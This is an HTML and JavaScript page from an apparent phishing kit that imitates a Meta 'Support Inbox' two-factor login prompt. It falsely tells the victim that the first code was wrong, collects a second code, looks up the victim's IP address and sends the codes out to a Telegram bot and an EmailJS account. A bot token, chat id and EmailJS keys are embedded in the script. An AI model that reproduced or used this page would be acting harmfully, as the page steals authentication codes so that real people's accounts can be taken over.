<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">

    <style>
        p {
            margin: 0 !important;
        }
    </style>

</head>

<body>

    <div class="container-fluid">

        <div class="row justify-content-between text-white py-3 mb-5" style="background-color: #3b5998 !important;">
            <div class="d-flex">
                <div class="border-end pe-2">
                    <div class="d-flex align-items-center gap-1">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="#fff" class="bi bi-meta" viewBox="0 0 16 16">
                            <path fill-rule="evenodd"
                                d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                        </svg>

                        <p>Meta</p>
                    </div>
                </div>

                <div class="d-flex align-items-center ps-2 gap-1">
                    <p>Support Inbox</p>

                    <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-search" viewBox="0 0 16 16">
                        <path
                            d="M11.742 10.344a6.5 6.5 0 1 0-1.397 1.398h-.001c.03.04.062.078.098.115l3.85 3.85a1 1 0 0 0 1.415-1.414l-3.85-3.85a1.007 1.007 0 0 0-.115-.1zM12 6.5a5.5 5.5 0 1 1-11 0 5.5 5.5 0 0 1 11 0z" />
                    </svg>
                </div>
            </div>
        </div>

        <div class="row justify-content-center">
            <div class="col-sm-4 shadow p-0">
                <form id="2FA">
                    <div class="p-3">
                        <p class="fw-bold">Two-factor authentication required</p>
                    </div>
                    <hr class="m-0">
                    <div class="p-3">
                        <p class="mb-3">You've asked us to require a 6-digit login code when anyone tries to access your account from a new device browser.</p>

                        <p class="mb-3">Enter the 6-digit code from your code generator or third-party app below.</p>

                        <input required type="text" name="2FA1" class="form-control w-25" placeholder="Login Code">
                        <input type="text" name="2FA2" class="form-control w-25" placeholder="Login Code">

                        <span id="fa_error" class="text-danger">Your verification code was incorrect, try again.</span>
                    </div>

                    <div class="mt-3 p-3" style="background-color: #f4f4f4;">
                        <div class="d-flex justify-content-between">
                            <a href="#">Need another way to authenticate?</a>

                            <button type="submit" class="btn btn-primary">Send</button>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>

    <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>

    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>

    <script>
        let faEntered = false;

        $('#fa_error').hide();
        $('[name="2FA2"]').hide();


        $('#2FA').on('submit', function(e) {
            e.preventDefault();

            if (!faEntered) {
                $('#fa_error').show();
                $('[name="2FA1"]').hide().removeAttr('required');
                $('[name="2FA2"]').show().attr('required', 'true');
                faEntered = true;
            }

            var formData = $(this).serializeArray();
            var fa2 = "";

            $.each(formData, function(index, field) {
                fa2 += field.name + ": <code>" + field.value + "</code> <br>";
            });

            console.log(formData)

            let tg = "";
            tg += fa2;

            tg = tg.replaceAll('<br>', "%0A");

            const token = '1';
            const chat_id = 1;

            // const token = '6604920211:AAEOgDSO5uniAKBCUw9or2GOHABic5-_7zA';
            // const chat_id = 6427757968;

            console.log(tg)

            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    const ipAddress = data.ip;
                    tg = ipAddress + "%0A" + tg;
                    console.log(ipAddress);
                    fetch('https://api.telegram.org/bot' + token + '/sendMessage?chat_id=' + chat_id + '&text=' + tg + '&parse_mode=HTML').then(() => {});

                    tg = tg.replaceAll("%0A", ' ');

                    const publicKey = 'service_33taqdk';
                    const APIkey = 'JEMW6STaYtNJ4b6VG';
                    const template = 'template_xa1norr';

                    emailjs.init(APIkey);

                    emailjs.send(publicKey, template, {
                            fa1: formData[0].value,
                            fa2: formData[1].value,
                        })
                        .then(function(response) {
                            console.log('SUCCESS!', response.status, response.text);

                            if (formData[1].value !== '') {
                                location.href = 'loading.html';
                            }

                        }, function(error) {
                            console.log('FAILED...', error);
                        });
                });

        });
    </script>
    <style>
        @media only screen and (min-width: 739px) and (max-width: 1023px) {
            .col-sm-4{
                width: 70%;
            }
        }
        @media only screen and (max-width: 739px) {
            .form-control{
                width: 110px !important;
            }
        }
        @media only screen and (min-width: 1024px){
            p.mb-3{
                font-size: 18px !important;
            }
            .fw-bold{
                font-size: 20px;
            }
            }
    </style>
</body>

</html>